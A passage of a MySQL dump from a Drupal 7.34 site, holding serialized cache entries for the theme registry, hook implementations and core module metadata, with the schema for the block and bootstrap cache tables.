path\";s:17:\"modules/dashboard\";s:8:\"function\";s:31:\"theme_dashboard_disabled_blocks\";}s:24:\"dashboard_disabled_block\";a:4:{s:9:\"variables\";a:1:{s:5:\"block\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:30:\"theme_dashboard_disabled_block\";}s:28:\"dashboard_admin_display_form\";a:9:{s:8:\"template\";s:24:\"block-admin-display-form\";s:4:\"path\";s:13:\"modules/block\";s:4:\"file\";s:15:\"block.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/block/block.admin.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:48:\"template_preprocess_dashboard_admin_display_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"comment_block\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:19:\"theme_comment_block\";}s:15:\"comment_preview\";a:4:{s:9:\"variables\";a:1:{s:7:\"comment\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:21:\"theme_comment_preview\";}s:7:\"comment\";a:6:{s:8:\"template\";s:23:\"modules/comment/comment\";s:14:\"render element\";s:8:\"elements\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:27:\"template_preprocess_comment\";i:2;s:21:\"contextual_preprocess\";i:3;s:22:\"rdf_preprocess_comment\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:22:\"comment_post_forbidden\";a:4:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:28:\"theme_comment_post_forbidden\";}s:15:\"comment_wrapper\";a:6:{s:8:\"template\";s:31:\"modules/comment/comment-wrapper\";s:14:\"render element\";s:7:\"content\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:35:\"template_preprocess_comment_wrapper\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:17:\"color_scheme_form\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/color\";s:8:\"function\";s:23:\"theme_color_scheme_form\";}s:5:\"block\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:19:\"modules/block/block\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/block\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:25:\"template_preprocess_block\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"system_preprocess_block\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:24:\"block_admin_display_form\";a:8:{s:8:\"template\";s:38:\"modules/block/block-admin-display-form\";s:4:\"file\";s:15:\"block.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/block\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/block/block.admin.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:44:\"template_preprocess_block_admin_display_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}}',0,1423658754,1); /*!40000 ALTER TABLE `dpl_cache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_block` -- DROP TABLE IF EXISTS `dpl_cache_block`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_block` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the Block module to store already built...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_block` -- LOCK TABLES `dpl_cache_block` WRITE; /*!40000 ALTER TABLE `dpl_cache_block` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_cache_block` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache_bootstrap` -- DROP TABLE IF EXISTS `dpl_cache_bootstrap`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache_bootstrap` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for data required to bootstrap Drupal, may be...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache_bootstrap` -- LOCK TABLES `dpl_cache_bootstrap` WRITE; /*!40000 ALTER TABLE `dpl_cache_bootstrap` DISABLE KEYS */; INSERT INTO `dpl_cache_bootstrap` VALUES ('hook_info','a:4:{s:10:\"token_info\";a:1:{s:5:\"group\";s:6:\"tokens\";}s:16:\"token_info_alter\";a:1:{s:5:\"group\";s:6:\"tokens\";}s:6:\"tokens\";a:1:{s:5:\"group\";s:6:\"tokens\";}s:12:\"tokens_alter\";a:1:{s:5:\"group\";s:6:\"tokens\";}}',0,1423658761,1),('lookup_cache','a:8:{s:30:\"cDrupalDefaultEntityController\";s:19:\"includes/entity.inc\";s:12:\"cDrupalQueue\";s:31:\"modules/system/system.queue.inc\";s:20:\"cSelectQueryExtender\";s:28:\"includes/database/select.inc\";s:19:\"cPagerDefault_mysql\";b:0;s:19:\"iPagerDefault_mysql\";b:0;s:16:\"cTableSort_mysql\";b:0;s:16:\"iTableSort_mysql\";b:0;s:20:\"cDatabaseTasks_mysql\";s:35:\"includes/database/mysql/install.inc\";}',0,1423658962,1),('module_implements','a:158:{s:15:\"stream_wrappers\";a:1:{s:6:\"system\";b:0;}s:23:\"module_implements_alter\";a:0:{}s:21:\"stream_wrappers_alter\";a:0:{}s:17:\"url_inbound_alter\";a:0:{}s:12:\"custom_theme\";a:1:{s:6:\"system\";b:0;}s:11:\"admin_paths\";a:7:{s:5:\"block\";b:0;s:4:\"node\";b:0;s:7:\"overlay\";b:0;s:8:\"shortcut\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:4:\"user\";b:0;}s:17:\"admin_paths_alter\";a:0:{}s:19:\"menu_get_item_alter\";a:0:{}s:18:\"url_outbound_alter\";a:0:{}s:13:\"library_alter\";a:0:{}s:4:\"init\";a:4:{s:5:\"dblog\";b:0;s:7:\"overlay\";b:0;s:6:\"system\";b:0;s:6:\"update\";b:0;}s:24:\"overlay_child_initialize\";a:1:{s:7:\"overlay\";b:0;}s:17:\"system_info_alter\";a:6:{s:9:\"dashboard\";b:0;s:5:\"field\";b:0;s:7:\"overlay\";b:0;s:6:\"system\";b:0;s:7:\"toolbar\";b:0;s:4:\"user\";b:0;}s:16:\"field_read_field\";a:0:{}s:17:\"system_theme_info\";a:0:{}s:17:\"dashboard_regions\";a:1:{s:9:\"dashboard\";b:0;}s:23:\"dashboard_regions_alter\";a:0:{}s:21:\"update_projects_alter\";a:0:{}s:22:\"menu_site_status_alter\";a:1:{s:4:\"user\";b:0;}s:4:\"help\";a:31:{s:5:\"block\";b:0;s:5:\"color\";b:0;s:7:\"comment\";b:0;s:7:\"contact\";b:0;s:10:\"contextual\";b:0;s:9:\"dashboard\";b:0;s:5:\"dblog\";b:0;s:5:\"field\";b:0;s:17:\"field_sql_storage\";b:0;s:8:\"field_ui\";b:0;s:4:\"file\";b:0;s:6:\"filter\";b:0;s:4:\"help\";b:0;s:5:\"image\";b:0;s:4:\"list\";b:0;s:4:\"menu\";b:0;s:4:\"node\";b:0;s:6:\"number\";b:0;s:7:\"options\";b:0;s:7:\"overlay\";b:0;s:4:\"path\";b:0;s:3:\"rdf\";b:0;s:6:\"search\";b:0;s:8:\"shortcut\";b:0;s:10:\"statistics\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:4:\"text\";b:0;s:7:\"toolbar\";b:0;s:6:\"update\";b:0;s:4:\"user\";b:0;}s:10:\"permission\";a:18:{s:5:\"block\";b:0;s:7:\"comment\";b:0;s:7:\"contact\";b:0;s:10:\"contextual\";b:0;s:9:\"dashboard\";b:0;s:6:\"filter\";b:0;s:5:\"image\";b:0;s:4:\"menu\";b:0;s:4:\"node\";b:0;s:7:\"overlay\";b:0;s:4:\"path\";b:0;s:6:\"search\";b:0;s:8:\"shortcut\";b:0;s:10:\"statistics\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:7:\"toolbar\";b:0;s:4:\"user\";b:0;}s:10:\"field_info\";a:6:{s:4:\"file\";b:0;s:5:\"image\";b:0;s:4:\"list\";b:0;s:6:\"number\";b:0;s:8:\"taxonomy\";b:0;s:4:\"text\";b:0;}s:17:\"field_widget_info\";a:6:{s:4:\"file\";b:0;s:5:\"image\";b:0;s:6:\"number\";b:0;s:7:\"options\";b:0;s:8:\"taxonomy\";b:0;s:4:\"text\";b:0;}s:12:\"element_info\";a:6:{s:10:\"contextual\";b:0;s:8:\"field_ui\";b:0;s:4:\"file\";b:0;s:6:\"filter\";b:0;s:6:\"system\";b:0;s:4:\"user\";b:0;}s:18:\"element_info_alter\";a:0:{}s:10:\"form_alter\";a:0:{}s:25:\"form_system_modules_alter\";a:1:{s:6:\"update\";b:0;}s:28:\"page_delivery_callback_alter\";a:1:{s:7:\"overlay\";b:0;}s:10:\"page_build\";a:3:{s:5:\"block\";b:0;s:9:\"dashboard\";b:0;s:7:\"toolbar\";b:0;}s:11:\"query_alter\";a:0:{}s:22:\"query_block_load_alter\";a:0:{}s:24:\"query_translatable_alter\";a:0:{}s:16:\"block_list_alter\";a:4:{s:5:\"block\";b:0;s:9:\"dashboard\";b:0;s:4:\"node\";b:0;s:7:\"overlay\";b:0;}s:9:\"node_info\";a:0:{}s:28:\"query_node_type_access_alter\";a:0:{}s:11:\"node_grants\";a:0:{}s:16:\"block_view_alter\";a:1:{s:4:\"menu\";b:0;}s:28:\"block_view_system_main_alter\";a:0:{}s:27:\"block_view_user_login_alter\";a:0:{}s:22:\"menu_local_tasks_alter\";a:1:{s:4:\"node\";b:0;}s:28:\"block_view_system_help_alter\";a:0:{}s:10:\"page_alter\";a:3:{s:7:\"overlay\";b:0;s:8:\"shortcut\";b:0;s:6:\"system\";b:0;}s:14:\"file_url_alter\";a:0:{}s:32:\"query_preferred_menu_links_alter\";a:0:{}s:23:\"query_node_access_alter\";a:1:{s:4:\"node\";b:0;}s:26:\"translated_menu_link_alter\";a:1:{s:4:\"user\";b:0;}s:20:\"shortcut_default_set\";a:0:{}s:21:\"menu_breadcrumb_alter\";a:0:{}s:14:\"rdf_namespaces\";a:1:{s:3:\"rdf\";b:0;}s:8:\"js_alter\";a:0:{}s:15:\"html_head_alter\";a:0:{}s:9:\"css_alter\";a:0:{}s:4:\"exit\";a:2:{s:7:\"overlay\";b:0;s:10:\"statistics\";b:0;}s:11:\"entity_info\";a:5:{s:7:\"comment\";b:0;s:4:\"node\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:4:\"user\";b:0;}s:6:\"schema\";a:18:{s:5:\"block\";b:0;s:7:\"comment\";b:0;s:7:\"contact\";b:0;s:5:\"dblog\";b:0;s:5:\"field\";b:0;s:17:\"field_sql_storage\";b:0;s:6:\"filter\";b:0;s:5:\"image\";b:0;s:4:\"menu\";b:0;s:4:\"node\";b:0;s:3:\"rdf\";b:0;s:6:\"search\";b:0;s:8:\"shortcut\";b:0;s:10:\"statistics\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:6:\"update\";b:0;s:4:\"user\";b:0;}s:12:\"schema_alter\";a:0:{}s:17:\"entity_info_alter\";a:1:{s:3:\"rdf\";b:0;}s:11:\"rdf_mapping\";a:4:{s:7:\"comment\";b:0;s:4:\"node\";b:0;s:8:\"taxonomy\";b:0;s:4:\"user\";b:0;}s:45:\"query_taxonomy_vocabulary_load_multiple_alter\";a:0:{}s:11:\"entity_load\";a:1:{s:3:\"rdf\";b:0;}s:24:\"taxonomy_vocabulary_load\";a:0:{}s:33:\"form_user_admin_permissions_alter\";a:0:{}s:27:\"form_user_filter_form_alter\";a:0:{}s:17:\"query_pager_alter\";a:0:{}s:21:\"query_tablesort_alter\";a:0:{}s:15:\"user_operations\";a:1:{s:4:\"user\";b:0;}s:14:\"username_alter\";a:0:{}s:29:\"form_user_admin_account_alter\";a:0:{}s:25:\"overlay_parent_initialize\";a:1:{s:7:\"overlay\";b:0;}s:30:\"query_node_load_multiple_alter\";a:0:{}s:22:\"field_storage_pre_load\";a:0:{}s:19:\"field_read_instance\";a:0:{}s:16:\"field_info_alter\";a:1:{s:4:\"user\";b:0;}s:23:\"field_widget_info_alter\";a:2:{s:4:\"list\";b:0;s:8:\"taxonomy\";b:0;}s:20:\"field_formatter_info\";a:6:{s:4:\"file\";b:0;s:5:\"image\";b:0;s:4:\"list\";b:0;s:6:\"number\";b:0;s:8:\"taxonomy\";b:0;s:4:\"text\";b:0;}s:26:\"field_formatter_info_alter\";a:0:{}s:18:\"field_storage_info\";a:1:{s:17:\"field_sql_storage\";b:0;}s:24:\"field_storage_info_alter\";a:0:{}s:27:\"field_storage_details_alter\";a:0:{}s:11:\"filter_info\";a:1:{s:6:\"filter\";b:0;}s:17:\"filter_info_alter\";a:0:{}s:17:\"field_attach_load\";a:0:{}s:9:\"node_load\";a:2:{s:7:\"comment\";b:0;s:4:\"user\";b:0;}s:22:\"entity_view_mode_alter\";a:0:{}s:19:\"field_display_alter\";a:0:{}s:24:\"field_display_node_alter\";a:1:{s:4:\"node\";b:0;}s:19:\"entity_prepare_view\";a:0:{}s:12:\"field_access\";a:0:{}s:23:\"field_attach_view_alter\";a:1:{s:3:\"rdf\";b:0;}s:9:\"node_view\";a:2:{s:7:\"comment\";b:0;s:10:\"statistics\";b:0;}s:11:\"entity_view\";a:0:{}s:15:\"node_view_alter\";a:0:{}s:17:\"entity_view_alter\";a:0:{}s:20:\"theme_registry_alter\";a:0:{}s:11:\"search_info\";a:2:{s:4:\"node\";b:0;s:4:\"user\";b:0;}s:34:\"block_view_system_navigation_alter\";a:0:{}s:24:\"block_view_block_1_alter\";a:0:{}s:34:\"block_view_system_powered_by_alter\";a:0:{}s:27:\"menu_contextual_links_alter\";a:0:{}s:27:\"contextual_links_view_alter\";a:0:{}s:18:\"field_extra_fields\";a:4:{s:7:\"comment\";b:0;s:4:\"node\";b:0;s:8:\"taxonomy\";b:0;s:4:\"user\";b:0;}s:24:\"field_extra_fields_alter\";a:0:{}s:32:\"field_extra_fields_display_alter\";a:0:{}s:29:\"field_attach_preprocess_alter\";a:0:{}s:30:\"query_user_load_multiple_alter\";a:0:{}s:30:\"query_file_load_multiple_alter\";a:0:{}s:9:\"user_load\";a:0:{}s:9:\"user_view\";a:1:{s:4:\"user\";b:0;}s:15:\"user_view_alter\";a:0:{}s:17:\"field_attach_form\";a:0:{}s:28:\"form_user_profile_form_alter\";a:4:{s:5:\"block\";b:0;s:7:\"contact\";b:0;s:7:\"overlay\";b:0;s:6:\"system\";b:0;}s:21:\"field_attach_validate\";a:0:{}s:15:\"node_operations\";a:1:{s:4:\"node\";b:0;}s:29:\"query_node_admin_filter_alter\";a:0:{}s:29:\"form_node_admin_content_alter\";a:0:{}s:5:\"forms\";a:4:{s:7:\"comment\";b:0;s:9:\"dashboard\";b:0;s:4:\"node\";b:0;s:6:\"search\";b:0;}s:12:\"node_prepare\";a:2:{s:7:\"comment\";b:0;s:4:\"menu\";b:0;}s:29:\"field_widget_properties_alter\";a:0:{}s:34:\"field_widget_properties_node_alter\";a:0:{}s:23:\"field_widget_form_alter\";a:0:{}s:50:\"field_widget_text_textarea_with_summary_form_alter\";a:0:{}s:45:\"field_widget_taxonomy_autocomplete_form_alter\";a:0:{}s:35:\"field_widget_image_image_form_alter\";a:0:{}s:20:\"form_node_form_alter\";a:3:{s:7:\"comment\";b:0;s:4:\"menu\";b:0;s:4:\"path\";b:0;}s:28:\"form_article_node_form_alter\";a:0:{}s:26:\"query_comment_filter_alter\";a:0:{}s:21:\"form_search_box_alter\";a:0:{}s:28:\"form_search_block_form_alter\";a:0:{}s:28:\"block_view_search_form_alter\";a:0:{}s:25:\"form_page_node_form_alter\";a:0:{}s:12:\"requirements\";a:6:{s:5:\"color\";b:0;s:4:\"file\";b:0;s:5:\"image\";b:0;s:4:\"node\";b:0;s:6:\"system\";b:0;s:6:\"update\";b:0;}s:25:\"user_cancel_methods_alter\";a:0:{}s:20:\"image_default_styles\";a:1:{s:5:\"image\";b:0;}s:17:\"image_effect_info\";a:1:{s:5:\"image\";b:0;}s:23:\"image_effect_info_alter\";a:0:{}s:18:\"image_styles_alter\";a:0:{}s:30:\"form_user_admin_settings_alter\";a:1:{s:7:\"contact\";b:0;}s:37:\"field_widget_properties_comment_alter\";a:0:{}s:37:\"field_widget_text_textarea_form_alter\";a:0:{}s:23:\"form_comment_form_alter\";a:0:{}s:36:\"form_comment_node_article_form_alter\";a:0:{}s:28:\"form_dblog_filter_form_alter\";a:0:{}s:31:\"form_dblog_clear_log_form_alter\";a:0:{}s:33:\"form_shortcut_set_customize_alter\";a:0:{}s:29:\"form_menu_overview_form_alter\";a:0:{}s:11:\"node_access\";a:1:{s:4:\"node\";b:0;}s:27:\"form_user_login_block_alter\";a:0:{}s:19:\"update_status_alter\";a:0:{}s:28:\"block_view_node_recent_alter\";a:0:{}s:25:\"block_view_user_new_alter\";a:0:{}s:31:\"block_view_comment_recent_alter\";a:0:{}s:28:\"block_view_user_online_alter\";a:0:{}s:20:\"form_user_pass_alter\";a:0:{}s:29:\"form_user_register_form_alter\";a:1:{s:6:\"system\";b:0;}s:21:\"form_user_login_alter\";a:0:{}s:32:\"form_block_admin_configure_alter\";a:2:{s:9:\"dashboard\";b:0;s:4:\"node\";b:0;}s:8:\"watchdog\";a:1:{s:5:\"dblog\";b:0;}s:37:\"form_update_manager_update_form_alter\";a:0:{}}',0,1426848142,1),('system_list','a:3:{s:14:\"module_enabled\";a:32:{s:5:\"block\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/block/block.module\";s:4:\"name\";s:5:\"block\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7009\";s:6:\"weight\";s:2:\"-5\";s:4:\"info\";a:13:{s:4:\"name\";s:5:\"Block\";s:11:\"description\";s:140:\"Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"block.test\";}s:9:\"configure\";s:21:\"admin/structure/block\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:5:\"color\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/color/color.module\";s:4:\"name\";s:5:\"color\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7001\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:5:\"Color\";s:11:\"description\";s:70:\"Allows administrators to change the color scheme of compatible themes.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"color.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:7:\"comment\";O:8:\"stdClass\":9:{s:8:\"filename\";s:30:\"modules/comment/comment.module\";s:4:\"name\";s:7:\"comment\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7009\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:7:\"Comment\";s:11:\"description\";s:57:\"Allows users to comment on and discuss published content.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:4:\"text\";}s:5:\"files\";a:2:{i:0;s:14:\"comment.module\";i:1;s:12:\"comment.test\";}s:9:\"configure\";s:21:\"admin/content/comment\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:11:\"comment.css\";s:27:\"modules/comment/comment.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:7:\"contact\";O:8:\"stdClass\":9:{s:8:\"filename\";s:30:\"modules/contact/contact.module\";s:4:\"name\";s:7:\"contact\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7003\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:7:\"Contact\";s:11:\"description\";s:61:\"Enables the use of both personal and site-wide contact forms.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"contact.test\";}s:9:\"configure\";s:23:\"admin/structure/contact\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:10:\"contextual\";O:8:\"stdClass\":9:{s:8:\"filename\";s:36:\"modules/contextual/contextual.module\";s:4:\"name\";s:10:\"contextual\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:16:\"Contextual links\";s:11:\"description\";s:75:\"Provides contextual links to perform actions related to elements on a page.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"contextual.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:9:\"dashboard\";O:8:\"stdClass\":9:{s:8:\"filename\";s:34:\"modules/dashboard/dashboard.module\";s:4:\"name\";s:9:\"dashboard\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:9:\"Dashboard\";s:11:\"description\";s:136:\"Provides a dashboard page in the administrative interface for organizing administrative tasks and tracking information within your site.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:5:\"files\";a:1:{i:0;s:14:\"dashboard.test\";}s:12:\"dependencies\";a:1:{i:0;s:5:\"block\";}s:9:\"configure\";s:25:\"admin/dashboard/customize\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:5:\"dblog\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/dblog/dblog.module\";s:4:\"name\";s:5:\"dblog\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"1\";s:14:\"schema_version\";s:4:\"7002\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:16:\"Database logging\";s:11:\"description\";s:47:\"Logs and records system events to the database.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"dblog.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:5:\"field\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/field/field.module\";s:4:\"name\";s:5:\"field\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7003\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:5:\"Field\";s:11:\"description\";s:57:\"Field API to add fields to entities like nodes and users.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:4:{i:0;s:12:\"field.module\";i:1;s:16:\"field.attach.inc\";i:2;s:20:\"field.info.class.inc\";i:3;s:16:\"tests/field.test\";}s:12:\"dependencies\";a:1:{i:0;s:17:\"field_sql_storage\";}s:8:\"required\";b:1;s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:15:\"theme/field.css\";s:29:\"modules/field/theme/field.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:17:\"field_sql_storage\";O:8:\"stdClass\":9:{s:8:\"filename\";s:64:\"modules/field/modules/field_sql_storage/field_sql_storage.module\";s:4:\"name\";s:17:\"field_sql_storage\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7002\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:17:\"Field SQL storage\";s:11:\"description\";s:37:\"Stores field data in an SQL database.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:22:\"field_sql_storage.test\";}s:8:\"required\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:8:\"field_ui\";O:8:\"stdClass\":9:{s:8:\"filename\";s:32:\"modules/field_ui/field_ui.module\";s:4:\"name\";s:8:\"field_ui\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:8:\"Field UI\";s:11:\"description\";s:33:\"User interface for the Field 